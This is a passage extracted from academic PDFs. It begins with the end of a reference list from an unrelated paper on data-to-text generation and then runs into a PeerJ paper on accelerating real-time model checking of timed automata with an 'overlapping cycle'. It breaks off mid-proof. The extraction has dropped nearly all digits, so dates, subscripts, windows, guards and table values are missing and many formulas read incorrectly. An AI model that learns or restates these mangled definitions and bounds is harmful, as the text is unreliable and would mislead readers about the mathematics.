o’reilly media. sarah boyd. . trend: a system for generating intelligent descriptions of time series data. in pro- ceedings of the nd ieee international conference on intelligent processing systems (icips). eugene charniak, don blaheta, niyu ge, keith hall, john hale, and mark johnson. . bllip - wsj corpus release ldc t . web download. philadelphia: linguistic data consortium. andrew gelman, john carlin, hal stern, david dunson, aki vehtari, and donald rubin. . bayesian data analysis. crc, rd edition. eli goldberg, norbert driedger, and richard i. kittredge. . using natural-language processing to produce weather forecasts. ieee expert, ( ): – . ian goodfellow, yoshua bengio, and aaron courville. . deep learning. mit press. richard h.r. hahnloser, rahul sarpeshkar, misha a. ma- howald, rodney j. douglas, and h. sebastian seung. . digital selection and analogue amplification coexist in a cortex-inspired silicon circuit. nature, ( ): – . trevor hastie, robert tibshirani, and jerome friedman. . the elements of statistical learning: data min- ing, inference, and prediction. springer, nd edition. frederick jelinek and robert mercer, . interpolated estimation of markov source parameters from sparse data, pages – . north-holland publishing. daniel jurafsky and james h. martin. . speech and language processing: an introduction to natural language processing, computational linguistics and speech recognition. prentice hall, nd edition. dave s kerby. . the simple difference formula: an approach to teaching nonparametric correlation. com- prehensive psychology, ( ). diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. arxiv preprint arxiv: . . suneel kumar kingrani, mark levene, and dell zhang. . diversity analysis of web search results. in pro- ceedings of the annual international acm web science conference (websci). ioannis konstas and mirella lapata. . a global model for concept-to-text generation. journal of artifi- cial intelligence research (jair), : – . manfred krifka. . approximate interpretations of number words: a case for strategic communication. in cognitive foundations of interpretation, pages – . john k kruschke. . doing bayesian data analysis: a tutorial with r, jags, and stan. academic press, nd edition. anne e. magurran. . ecological diversity and its measurement. princeton university press. christopher d. manning, prabhakar raghavan, and hin- rich schütze. . introduction to information re- trieval. cambridge university press. christopher d. manning, mihai surdeanu, john bauer, jenny rose finkel, steven bethard, and david mc- closky. . the stanford corenlp natural language processing toolkit. in proceedings of the nd annual meeting of the association for computational linguis- tics (acl), system demonstrations, pages – . hongyuan mei, mohit bansal, and matthew r. walter. . what to talk about and how? selective gen- eration using lstms with coarse-to-fine alignment. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies (naacl- hlt), pages – . chris mellish and robert dale. . evaluation in the context of natural language generation. computer speech & language, ( ): – . priscilla moraes, kathleen mccoy, and sandra carberry. . adapting graph summaries to the users’ reading levels. in proceedings of the th international natural language generation conference (inlg), pages – . mark e. j. newman. . power laws, pareto distribu- tions and zipf’s law. contemporary physics, ( ): – . kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic evalu- ation of machine translation. in proceedings of the th annual meeting of the association for computational linguistics (acl), pages – . vassilis plachouras, charese smiley, hiroko bretz, ola taylor, jochen l. leidner, dezhao song, and frank schilder. . interacting with financial data us- ing natural language. in proceedings of the th in- ternational acm sigir conference on research and development in information retrieval (sigir), pages – . david mw powers. . applications and explanations of zipf’s law. in proceedings of the joint conferences on new methods in language processing and computa- tional natural language learning (nemlap/conll), pages – . dragomir r. radev, hong qi, harris wu, and weiguo fan. . evaluating web-based question answer- ing systems. in proceedings of the rd international conference on language resources and evaluation (lrec). alejandro ramos-soto, alberto bugarı́n, senén barro, and juan taboada. . automatic generation of textual short-term weather forecasts on real prediction data. in proceedings of the th international confer- ence on flexible query answering systems (fqas), pages – . josef raviv. . decision making in markov chains applied to the problem of pattern recognition. ieee transactions on information theory, ( ): – . robert t. reagan, frederick mosteller, and cleo youtz. . quantitative meanings of verbal probability ex- pressions. journal of applied psychology, ( ): . ehud reiter and anja belz. . an investigation into the validity of some metrics for automatically evalu- ating natural language generation systems. computa- tional linguistics, ( ): – . ehud reiter, somayajulu sripada, jim hunter, jin yu, and ian davy. . choosing words in computer- generated weather forecasts. artificial intelligence, ( - ): – . ehud reiter. . an architecture for data-to-text sys- tems. in proceedings of the th european workshop on natural language generation (enlg), pages – . stuart russell and peter norvig. . artificial intelli- gence: a modern approach. prentice hall, rd edition. david w scott. . multivariate density estimation: theory, practice, and visualization. john wiley & sons. claude e. shannon. . a mathematical theory of com- munication. bell system technical journal, : – . heung-yeung shum, xiaodong he, and di li. . from eliza to xiaoice: challenges and opportunities with social chatbots. arxiv preprint arxiv: . . edward h simpson. . measurement of diversity. nature. charese smiley, vassilis plachouras, frank schilder, hi- roko bretz, jochen l. leidner, and dezhao song. . when to plummet and when to soar: corpus based verb selection for natural language generation. in pro- ceedings of the th international natural language generation conference (inlg), pages – . somayajulu sripada, neil burnett, ross turner, john mastin, and dave evans. . a case study: nlg meeting weather industry demand for quality and quan- tity of textual weather forecasts. in proceedings of the th international natural language generation con- ference (inlg), pages – . ellen m. voorhees. . the trec- question an- swering track report. in proceedings of the th text retrieval conference (trec), pages – . dennis wackerly, william mendenhall, and richard scheaffer. . mathematical statistics with applica- tions. nelson education. frank wilcoxon. . individual comparisons by rank- ing methods. biometrics bulletin, ( ): – . alex wright. . algorithmic authors. communica- tions of the acm (cacm), ( ): – . chengxiang zhai and john lafferty. . a study of smoothing methods for language models applied to in- formation retrieval. acm transactions on information systems (tois), ( ): – . submitted october accepted april published may corresponding author lei zhuang, ielzhuang@zzu.edu.cn academic editor maurice ter beek additional information and declarations can be found on page doi . /peerj-cs. copyright wang et al. distributed under creative commons cc-by . open access exact acceleration of complex real-time model checking based on overlapping cycle guoqing wang , lei zhuang , yu song , mengyang he , ding ma and ling ma , school of information engineering, zhengzhou university, zhengzhou, henan, china college of information science and engineering, henan university of technology, zhengzhou, henan, china digital medical image technique research center, zhengzhou university, zhengzhou, henan, china abstract when real-time systems are modeled as timed automata, different time scales may lead to substantial fragmentation of the symbolic state space. exact acceleration solves the fragmentation problem without changing system reachability. the relatively mature technology of exact acceleration has been used with an appended cycle or a parking cycle, which can be applied to the calculation of a single acceleratable cycle model. using these two technologies to develop a complex real-time model requires additional states and consumes a large amount of time cost, thereby influencing acceleration efficiency. in this paper, a complex real-time exact acceleration method based on an overlapping cycle is proposed, which is an application scenario extension of the parking- cycle technique. by comprehensively analyzing the accelerating impacts of multiple acceleratable cycles, it is only necessary to add a single overlapping period with a fixed length without relying on the windows of acceleratable cycles. experimental results show that the proposed timed automaton model is simple and effectively decreases the time costs of exact acceleration. for the complex real-time system model, the method based on an overlapping cycle can accelerate the large scale and concurrent states which cannot be solved by the original exact acceleration theory. subjects real-time and embedded systems, theory and formal methods keywords real-time model checking, exact acceleration, complex real-time system, timed automata, overlapping cycle introduction in real-time embedded systems, especially complex real-time control systems, discrete logic control and continuous time behavior depend on and influence each other. take the internet of things (iot) gateway security system (wang et al., ) as an example: its control center generally has many different control modes to deal with diverse security risks, such as tampering, intrusion, and identity forging. important system parameters (e.g., sensor status, monitoring instructions, and terminal feedback information) change continuously over time. to meet specific time constraints or parameter values in the iot gateway security system, the management mode must be adjusted over time. the change rules of important parameters also differ by mode, and the response time to how to cite this article wang g, zhuang l, song y, he m, ma d, ma l. . exact acceleration of complex real-time model checking based on overlapping cycle. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:ielzhuang@zzu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. various events should be modified accordingly. in this type of system (lee et al., ), logic control describes the logical control transformation of the system through models with high abstraction levels, such as finite state machine and petri net. time behavior can be simulated by clock variables and clock zone transformation. between the two layers, signals of the continuous layer and control modes of the discrete layer are correlated and transformed by certain interfaces and rules. typically, test and simulation technologies are the main means of guaranteeing software quality; however, they cover problems when using the operating system as the main measure, which cannot guarantee test completeness. these approaches are thus incapable of traversing all states in a real-time system, leading to covert problems in system operations (wang, pastore & briand, ). in the field of security-related systems with zero tolerance for system error, using formal theory and technology for security authentication results in clear descriptions and avoids the complexity of safety verification. formal description analysis and refinement have thus become a focus of recent research in related fields. in real-time model checking, timed automata can model the temporal behavior of real-time systems (pinisetty et al., ). clocks describe the state transitions, and clock constraints serve as the theoretical basis for real-time system model checking (han, yang & xing, ). this approach can easily realize automatic combination and transformation with other methods. the method is widely used in polling control systems, railway interlocking systems, and similar applications. due to clock variables, control programs and external environments often use different time measures, which can cause the number of states to increase exponentially when a timed automaton is transformed into a zone automaton. the reachability analysis algorithm generates many state fragments (iversen et al., ; chen & cui, ), resulting in a sharp increase in the state space and considerably prolonged detection time. the acceleration technique is a reduction method used to solve the fragmentation problem following from time measurement differences. dubout & fleuret ( ) applied an acceleration technique to linear target detection and effectively improved the detection performance. jeong et al. ( ) applied an implicit markov model as an improved framework to accelerate the inference model. for distributed and parallel computing, a workstation and a multicore processor were used to accelerate state-space searching (konur, fisher & schewe, ). lin, chen & xu ( ) studied an acceleration model using a bayesian classifier by analyzing the behavior of heterogeneous population trends; results indicated that acceleration in the reliability assessment improved the analytic accuracy. the model checking of linear temporal logic (ltl) model was studied by barnat et al. ( ), which employed computed unified device architecture for acceleration. two sat problem solvers were used to validate online models and accelerate the processing of complex behaviors (qanadilo, samara & zhao, ). the reachability problem is the first to consider in timed automata, which determines whether a path exists from its initial state to a target state. this problem can be solved by computing the zones that apply the abstraction technique in practice. state-of-the-art abstraction methods (behrmann et al., ; herbreteau, srivathsan & walukiewicz, ) produce an approximation closer to the actual reachable clock valuation, which includes wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. coarser abstractions. exact acceleration is an excellent means of abstraction to reduce required storage space and can alleviate state-space explosion. for practical issues such as protocol validation (zhang et al., ), iot system modeling (li et al., ), and smart contract security verification in blockchain (cruz, kaji & yanai, ; grishchenko, maffei & schneidewind, ), exact acceleration technology is an efficient way of minimizing required storage space and time. when iversen et al. ( ) used uppaal to verify the lego robotic system, a fragmentation problem was identified and briefly described, and some ideas for further research were suggested. an approximation technique was applied to a real-time system model for security and connectivity analysis, which avoided repetitive control (möller, ). after that, a real-time property language l∀s was proposed to check the rejection state of reachability and reduce safety and boundary liveness simultaneously (aceto et al., ). the problems and methods in these publications have promoted the concept of exact acceleration and inspired further research. related studies on exact acceleration in real-time model checking include hendriks & larsen ( ), yin, song & zhuang ( ), yin, zhuang & wang ( ), gou et al. ( ), boudjadar et al. ( ), and chadli et al. ( ). in the following four examples, the window of the acceleratable cycle is [a,b]. • hendriks & larsen ( ) introduced a method of syntax adjustment to a subset of timed automata by adding an appended cycle whose length was da/(b−a)e times longer than that of the acceleratable cycle. this method accelerates forward symbolic reachability analysis, which solves the fragmentation problem and optimizes the verification of the lego robotic system. • yin, song & zhuang ( ) proposed a method to identify the acceleratable cycle in timed automata by introducing topological sorting for a large state space of a timed automaton; by simplifying the scale of timed automata, the method operated efficiently. • an exact acceleration method based on a parking cycle was proposed (yin, zhuang & wang, ), in which the entry boundary condition was determined by the size of the acceleratable cycle’s window (the condition is z ≥a× ab−a +n ); the automaton model improved the speed of exact acceleration and reduced the cost. • by analyzing the main parameters of the acceleration process, gou et al. ( ) proposed a method for determining whether exact acceleration was required. this approach can be used to avoid adding an appended cycle to reduce verification speed when the number of fragments is small, or fragments do not satisfy certain conditions. • boudjadar et al. ( ) proposed a development method to improve the utilization rate of resources by using model-checking technology. in the design and development stage, exact acceleration technology was used to greatly improve the capability of symbolic model checking in a processing scheduling system. for the scheduling problem of network physical systems, chadli et al. ( ) modeled advanced specifications and validation frameworks with the help of exact acceleration technology, automatically transforming high-level specifications into formal models. the above two research works mainly applied exact acceleration to model a system resource scheduling problem but did not improve the original exact acceleration theory. wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. when modeling a complex real-time system (wang et al., ), multiple acceleratable cycles may overlap at the same location. if the appended cycle method is used for exact acceleration, then the added locations multiply as the number of acceleratable cycles increases, resulting in insufficient memory for model checking. if the parking cycle method is used for exact acceleration, acceleratable-cycle stacking leads to non-uniformity in parking-cycle entry conditions; differences in the windows of multiple acceleratable cycles can increase time consumption drastically. in this paper, we propose an exact acceleration method for complex real-time model checking based on an overlapping cycle, which is an application scenario extension of parking-cycle technique. a single overlapping cycle is developed by comprehensively analyzing the accelerating effects of multiple acceleratable cycles and analyzing acceleration differences among these cycles. the overlapping cycle is simple to create and has a fixed length, eliminating the need to add multiple locations for complex real-time models. the overlapping cycle adds much less state space than appended cycles or parking cycles in model checking, substantially reducing the acceleration cost. the proposed method can be effectively applied to modeling and verification of complex real-time systems such as the iot gateway security system. it can also alleviate additional consumption of time and space caused by state-space explosion while maintaining the original nature of the system. the remainder of this paper is organized as follows. the section ‘preliminaries’ briefly introduces timed automata, forward symbolic reachability analysis, and the theory of exact acceleration. the exact acceleration method for complex real-time models based on an overlapping cycle is proposed in ‘exact acceleration of complex real-time system model based on overlapping cycle’, which outlines the method of creating a single, fixed-length overlapping cycle. a timed automaton with an overlapping cycle is shown to accelerate the originally timed automaton with reachability. in ‘experimental results’, the acceleration effects of the appended cycle, parking cycle, and overlapping cycle with a complex real-time model example are compared using experiments. finally, the ‘conclusion’ provides a few ideas for future research. preliminaries timed automata this part is based on work by alur & dill ( ). to illustrate the real-time clock of timed automata more clearly, we define a clock constraint set t(c) contain all clock constraints. we assume that the set of clock variables is c, and the definition of the set of clock constraints τ is as follows: τ :=c ∼n|τ ∧τ where c ∈c, n∈n, and ∼ denotes one of the binary relationships {<,≤,=,≥,>}. the clock constraint set t(c) is the set of all clock constraints τ . a clock interpretation ν is a mapping from c to r+∪{ }, where r+ represents the set of positive real numbers. note that ν assigns each clock variable in the set of clock variables c. for a set x ⊆c, x := indicates that x assigns to each c ∈x (i.e., clock reset), whereas the clock variables in set c−x have no effects. wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure timed automaton m. full-size doi: . /peerjcs. /fig- definition (timed automaton). a timed automaton is defined as a six-tuple (c,l,l ,a,i,e), where c is a set of clocks, l is a finite set of locations, l ⊆l is the set of initial locations, a is a set of action events, i represents mapping that provides every location l ∈l with some clock constraint in t(c), and e ⊆l×a×t(c)× c ×l is a set of edges. an edge (l,a,τ,λ,l ′ ) denotes a transition: when the clock constraint in location l satisfies τ , the system can complete action event a, move from location l to location l ′ , and allow clocks in λ to be reset. figure shows an example of a timed automaton. the timed automaton m represents a plain and abstract model of the control program and the external environment in a real-time system. if the control program sends instructions to the control center in an iot security system, the environment will be decided by sensors and actuators. the cycle of locations l , l , and l model the control program labeled the control cycle, consisting of three atomic instructions, whose clock is x. the external environment is modeled by clock y, which is checked each time in l . the clock y also called global clock. the size of the threshold constant large determines how slow the environment is relative to the control program. if y ≥large, the control cycle may be exited. the semantics of a timed automaton m is defined by a transition system s(m) with alur & dill ( ). a state of s(m) is a pair (l,ν), where l is a location of m and ν indicates a clock interpretation for c such that ν satisfies i(l). regarding this transition system, the traces of a timed automaton have been defined by hendriks & larsen ( ). forward symbolic reachability analysis the forward symbolic reachability analysis algorithm is a core of the real-time model- checking tool uppaal (behrmann, david & larsen, ). the model-checking engine uses an on-the-fly strategy to search forward from the initial location to determine whether a symbolic state is reachable. for each symbolic state that has not yet been explored, it is necessary to calculate subsequent states based on their clocks and actions and compare them to searched symbolic states. if they have been seen in the past, they are discarded; otherwise, they are added to the list of explored symbolic states. the reachability property ϕ of a timed automaton m can be presented as the timed computation tree logic (tctl) formula e <> (p), where p is a state property of m. wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table results of symbolic states from a forward symbolic exploration by timed automaton m. state location zone l y = x = y − x = l < y ≤ < x ≤ y − x = l < y ≤ ≤x ≤ < y − x ≤ l < y ≤ ≤x ≤ < y − x ≤ l < y ≤ ≤x ≤ < y − x ≤ l < y ≤ ≤x ≤ < y − x ≤ l < y ≤ ≤x ≤ < y − x ≤ l < y ≤ ≤x ≤ < y − x ≤ l < y ≤ ≤x ≤ < y − x ≤ l < y ≤ ≤x ≤ < y − x ≤ l <y ≤ ≤x ≤ <y − x ≤ l <y ≤ ≤x ≤ < y − x ≤ we describe that m satisfies ϕ, denoted by m � ϕ, if a trace exists in the form of ((l ,ν ),(l ,ν ),...)∈tr(m), where (li,νi)� p for some i≥ . to describe the process of forward symbolic reachability analysis, we take automaton m in fig. as an example. table shows the symbolic states that timed automaton m searches forward from the initial location after one execution. in table , symbolic states and are both l . however, the clock zones are not identical; these states represent two different symbolic states to be further forward searched. therefore, every execution of the control cycle results in new symbolic states. because the threshold large is usually larger and clock y is especially smaller, the timed automaton m must execute a certain number of control cycles to increase clock y effectively when verifying the reachability of l . the number of executions depends on large; if large is large, then there are more executions. due to different clocks, when the model checking tools detect a symbolic model cycle by cycle, many unnecessary clock fragments may appear in the state space, causing a forward symbolic fragment problem. for example, if we only observe the symbolic states , , and of location l , we can find that each clock zone overlaps with the zone in front of it, which is called clock zone continuous. at this time, because of the small-time measurement in the cycle, the overlapped clock zone is divided into infinite segments, which leads to the fragmentation problem. table lists results from the uppaal simulator. exact acceleration hendriks & larsen ( ) proposed the concept of exact acceleration, based on which, we provide basic definitions for our study. the acceleratable cycle is a key concept in exact acceleration. an acceleratable cycle can use only one clock in clock constraints (including invariants, guards, and resets). definition (acceleratable cycle). let m = (c,l,l ,a,i,e) be a timed automaton, ec =(e ,...,en− )∈en, and x ∈c. an acceleratable cycle is defined as a two-tuple (ec,x) when the following conditions are satisfied: wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • ec is a cycle; • for all locations in ec, i(l) is either empty or in the form of {x ≤c}; • if (l,a,τ,λ,l ′ )∈ec, then τ is empty or in the form of {x ≥ c}, and λ is empty or only contains x; and • x must be reset on all in-going edges to src(e ). clock x is the clock of the cycle, i(l) is the location invariant, and τ is the edge guard. the location src(e ) is the reset location whose out-going edge is e , which indicates the external clock’s checking position in the acceleratable cycle. if a specific location’s in-going edge is ei in the cycle, then the out-going edge of this position is ei+ , where i∈[ ,n− ]. the cycle in automaton m (fig. ), composed of locations l , l , and l , is an acceleratable cycle. the clock of the cycle is x, and the reset location is l . the invariants and guards are in accordance with the defined form of clock x, and the clock resets to zero at the only in-going edge of l . definition (window of acceleratable cycle). let an acceleratable cycle in the timed automaton m be (ec,x). the compression sequence of all traces is expressed as tr(ec)= ( (l ,ν ), ( l ,ν ′ ) ,(l ,ν ),...,(ln− ,νn− ), ( ln− ,ν ′ n− ) ,(ln,νn) ) , where νi and ν ′ i indicate different clock interpretations, i∈[ ,n], and l = ln= src(e ).((lj,ν ′ j),(lj+ ,νj+ )) depends on the edge ej and can be understood as an action event of ej, j ∈[ ,n− ]. the window of the acceleratable cycle (ec,x) is defined as the interval [a,b], a,b∈n when the following conditions are satisfied: • the total delay of tr(ec) is an element of [a,b]; and • for any real number d ∈[a,b], we adjust the delays under legal clock constraints in tr(ec) to ensure the total delay is d. the meaning of the total delay in this definition is an increase in the clock of the cycle, which can be simply defined as the increment of the external clock when the acceleratable cycle returns to the reset location once from the initial location. the window is the minimal and maximal time it may take to pass through a cycle. according to this definition, the window of the acceleratable cycle shown in fig. can be calculated as [ , ]. definition (accelerated automaton based on appended cycle). let m = (c,l,l ,a,i,e)be a timed automaton, and let cycle=(ec,x) be an acceleratable cycle of m, where l= {l ,l ,...,lm}, ec = (e ,e ,...,en− ), ei= (li,ai,τi,λi,li+ ). acceleration of m based on the appended cycle is a new automaton acca(m,cycle) defined as (c,l′,l ,a,i ′,e′), where • l′=l∪ { l′ ,l ′ ,...,l ′ n− } ∪ { l′ } ∪ { l ′′ ,l ′′ ,...,l ′′ n− } • i ′(li)= i(li), ≤ i≤m • i ′ ( l′i ) = i(li), ≤ i≤n− • i ′ ( l′ ) =∅ • i ′ ( l ′′ i ) = i(li), ≤ i≤n− wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • e′ = e ∪ {( l ,a ,τ ,λ ,l′ ) , ( l′n− ,an− ,τn− ,λn− ,l ′ )} ∪ {( l′ ,a ,τ ,λ ,l ′′ ) , ( l′′n− ,an− ,τn− ,λn− ,l )} ∪ { (l′i,ai,τi,λi,l ′ i+ ),(l ′′ i ,ai,τi,λi,l ′′ i+ )| ≤ i≤n− } • in particular, e′=e∪ {( l ,a ,τ ,λ ,l′ ) , ( l′ ,a ,τ ,λ ,l )} when n= . theorem . let m =(c,l,l ,a,i,e) be a timed automaton, and let cycle =(ec,x) be an acceleratable cycle of m with a window [a,b]. if ϕ is the reachability property of m, then a≤ b⇒(m �ϕ⇔acca(m,cycle) �ϕ). theorem has been proved in hendriks & larsen ( ). in definition , the appended cycle is obtained by expanding the acceleratable cycle twice. if the timed automaton m is added to the appended cycle by expanding the acceleratable cycle i times, then the precondition in theorem can be generalized to (i+ )a≤ ib. definition (accelerated automaton based on parking cycle). let m =(c,l,l ,a,i,e) be a timed automaton, and let cycle=(ec,x) be an acceleratable cycle of m with a window of [a,b], where l= {l ,l ,...,lm}, ec= (e ,e ,...,en− ), ei = (li,ai,τi,λi,li+ ). the global clock is y, and the maximum value of y before entering the acceleratable cycle is n . the acceleration of m based on the parking cycle is a new automaton accp(m,cycle) defined as (c,l′,l ,a,i ′,e′), where • l′=l∪ { l′ } • i ′(li)= i(li), ≤ i≤m • i ′ ( l′ ) =∅ • e′=e∪ {( l ,a ,τ′,∅,l′ ) , ( l′ ,an− ,∅,λn− ,l )} , τ ′ is y ≥a× ⌈ a b−a ⌉ +n . definition has been given in yin, zhuang & wang ( ). the accelerated automaton acca(m,cycle) equals the timed automaton m with an appended cycle composed of locations l ,l ′ ,l ′ ,...,l ′ n− ,l ′ ,l ′′ ,l ′′ ,...,l ′′ n− . accelerated automaton accp(m,cycle) equals the timed automaton m with a parking cycle whose edge guard y controls the acceleration timing. only when the acceleratable cycle has been executed at leastda/(b−a)e times is the automaton permitted to enter the parking cycle. figures and display the acceleration of m (fig. ) based on the appended cycle and parking cycle, respectively. they are labeled the accelerated automata ma and mp. because the window of the acceleratable cycle is [ , ], the edge guard of the parking cycle is y ≥ in mp. theorem . let m =(c,l,l ,a,i,e) be a timed automaton, and let cycle =(ec,x) be an acceleratable cycle of m with a window of [a,b]. if ϕ is a reachability property of m, then a<b⇒(m �ϕ⇔accp(m,cycle) �ϕ). yin, zhuang & wang ( ) gives this theorem form forward symbolic reachability analysis, and this is the previous achievement of our working group. we will give its another proof in the view of zone later. wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure accelerated automaton ma based on appended cycle. full-size doi: . /peerjcs. /fig- figure accelerated automaton mp based on parking cycle. full-size doi: . /peerjcs. /fig- wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure timed automaton m ′. full-size doi: . /peerjcs. /fig- exact acceleration of complex real-time system model based on overlapping cycle the appended cycle and parking cycle technologies in exact acceleration apply to a real-time system model with a single acceleratable cycle. for a complex real-time system model (as wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. shown in fig. ), using these two technologies for exact acceleration requires additional states and consumes a large amount of time cost, which influences the acceleration effect. figure presents an example of the iot gateway security system (in wang et al., ). the timed automaton m ′ models a wireless sensor network including a reactive program and external environment. the run-time behavior control several sensors, which can be transformed into clock constrains in uppaal. every location in the cycle represents a sensor model in the iot system. the cycle’s clock is x, and clock y controls the execution time. the larger the constant large is, the more slowly the timed automaton m ′ runs. using the algorithm described by yin, song & zhuang ( ) to identify the acceleratable cycle in m ′, we obtain four acceleratable cycles whose reset locations are all l and share the clock of cycle x. for this complex real-time model, we propose a method based on the overlapping cycle for exact acceleration. theorem . let m =(c,l,l ,a,i,e) be a timed automaton, and let cycle =(ec,x) be an acceleratable cycle of m with a window of [a,b]. if a < b, there is a positive integer n in the forward symbolic reachability analysis, which leads the reset location to obtain a continuous clock zone after executing the cycle n times. proof. according to the forward symbolic reachability analysis, the problem of fragments in the acceleratable cycle will inevitably lead to the overlap of clock zones, that is, the appearance of continuous clock zone. if a < b, according to the definitions about exact acceleration, the continuous clock zone will be got after several executions of the acceleratable cycle, and the point of the proof is to determine the number of executions. so, without loss of generality, we might assume that the execution number is a positive integer n. let n be the rounds of cycle execution, and let the interval [c,d] be the clock zone at the reset location before execution of the cycle. at the reset location, the clock zone is continuous from the (n+ )th time onward; therefore, the clock zones obtained in the (n+ )th time and the nth time have an intersection that is (n+ )a+c ≤nb+d ⇒n≥(a+c−d)/(b−a). because b>a, d ≥c, there must be an integer n≥a/(b−a). so, the number of executions should be at least da/(b−a)e. when the cycle is executed da/(b−a)e (that is n) times, the reset location obtains a continuous clock zone, thereby completing the proof. corollary . if the timed automaton m has an acceleratable cycle with a window of [a,b], a<b, then the reset location will obtain a continuous clock zone after executing the cycle at least a/(b−a) times during forward symbolic reachability analysis. proof. according to theorem , we easily know the reset location obtains a continuous clock zone when the cycle is executed n times. for the integer n, we can calculate that n≥a/(b−a). the proof is completed. corollary . let the global clock be y, and let the maximum value of y before entering the acceleratable cycle be n . if the timed automaton m has an acceleratable cycle with a window of [a,b], a<b, then the reset location will obtain a continuous clock zone when the following condition is satisfied during forward symbolic reachability analysis: y−n ≥a×a/(b−a). wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. proof. according to corollary , the reset location will obtain a continuous clock zone after executing the acceleratable cycle at least a/(b−a) times. because the window of the acceleratable cycle is [a,b], the increment of y by executing the acceleratable cycle a/(b−a) times is denoted as y ∈[a×a/(b−a),b×a/(b−a)], where y =y−n . therefore, when y−n ≥a×a/(b−a), the reset location will obtain a continuous clock zone. the proof is completed. corollary . let the global clock be y, and let the maximum value of y before entering the acceleratable cycle be n . if the timed automaton m has an acceleratable cycle with a window of [a,b], a < b, then every location in the acceleratable cycle will obtain a continuous clock zone when y−n ≥a×a/(b−a). proof. because clock y is not the cycle clock, any invariant or guard in the acceleratable cycle will not contain clock y according to definition . based on the theory of timed automata, clock y exhibits monotonous growth when the acceleratable cycle is executed. thus, when y−n ≥a×a/(b−a), per corollary , the reset location begins to obtain a continuous clock zone, indicating that every location in the acceleratable cycle is reachable. at this point, a constant clock zone will also be received by any location in the acceleratable cycle, and the proof is completed. next, we will give the new proof of theorem . proof. sufficient condition. the known condition is a < b. because accp(m,cycle) is obtained by adding a parking cycle to m, the timed automaton m can clearly reach any reachable state in original model. the accelerated automaton accp(m,cycle) can also reach states by executing the same time trace; that is, the state transition system s(m) associated with m is included in the state transition system s(accp(m,cycle)) associated with accp(m,cycle). necessary condition. the known condition is a < b. let the global clock be y. when y < a×a/(b−a)+n , the accelerated automaton accp(m,cycle) does not execute the parking cycle, and reachable states in accp(m,cycle) are also reachable in the timed automaton m. when y ≥a×a/(b−a)+n (according to corollary ), every location in the acceleratable cycle of m will obtain a continuous clock zone; that is, after y ≥a×a/(b−a)+n at any time, m can reach any location in the acceleratable cycle and accp(m,cycle) executes the parking cycle, satisfies the edge guards, and returns to the reset location of any state, which guarantees that m is always reachable. in summary, when a<b, the accelerated automaton accp(m,cycle) does not change the reachability property ϕ of the timed automaton m, and the proof is completed. according to our theorems and corollaries, we can prove that the exact acceleration method based on the parking cycle is more concise and effective than that based on the appended cycle. on one hand, there is no location invariant in the parking cycle to ensure the clock can stay in this location for acceleration; on the other hand, the parking cycle contains an edge guard to ensure that any location of the acceleratable cycle obtains a continuous clock zone, which provides reachability. in this way, the parking cycle accelerates the search for the symbolic state by controlling acceleration timing and ensures reachability of the timed automaton to realize exact acceleration. the exact acceleration method for the complex real-time model based on an overlapping cycle is an improved wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. method based on the parking cycle. it attempts to extend the application field of exact acceleration technology to complex real-time model checking to improve efficiency and alleviate state explosion. theorem . let m =(c,l,l ,a,i,e) be a timed automaton with several acceleratable cycles. let cyclei= (eci,x) be the ith acceleratable cycle of m with a window of [ai,bi], where i is a non-zero natural number. all acceleratable cycles affect the cycle of clock x, and their reset locations are uniform in lreset ∈l. there is a single acceleratable cycle whose effect is the most effective in obtaining a continuous clock zone than multiple acceleratable cycles. proof. let nj = ⌈ aj bj−aj ⌉ ×aj, nk = ⌈ ak bk−ak ⌉ ×ak, where ≤ j,k≤ i, and j, k are non-zero natural numbers. then, nj and nk represent the edge guard of the jth and kth acceleratable cycle, respectively, when adding a parking cycle. if these two acceleratable cycles are executed simultaneously, the edge guard can be expressed as njk = ⌈ aj+ak (bj−aj)+(bk−ak) ⌉ × ( aj+ak ) . the window of the ith acceleratable cycle is [ai,bi] as a known condition, where ≤aj ≤bj, ≤ak ≤bk, and there is aj+ak ≥aj,ak. we make aj bj−aj = u v , ak bk−ak = x y , such that aj+ak (bj−aj)+(bk−ak) = u+x v+y . we assume that u v is smaller, then xy = u+µ v , µ∈r +. therefore, there is u+xv+y = u+u+µ v+v = u v + µ v > u v ; that is,⌈u+x v+y ⌉ ≥ ⌈u v ⌉ and ⌈u+x v+y ⌉ ≥min( ⌈u v ⌉ , ⌈x y ⌉ ). in the positive-number condition, a larger number multiplied by a larger number is either equal to or greater than a smaller number multiplied by a smaller number; therefore,⌈ u +x v +y ⌉ ×(aj+ak)≥min( ⌈ u v ⌉ ×aj, ⌈ x y ⌉ ×ak) which is njk ≥min(nj,nk). according to corollary , the reset location will obtain a continuous clock zone after executing the acceleratable cycle, which has a smaller value of ⌈ ai bi−ai ⌉ ×ai, ⌈ ai bi−ai ⌉ times 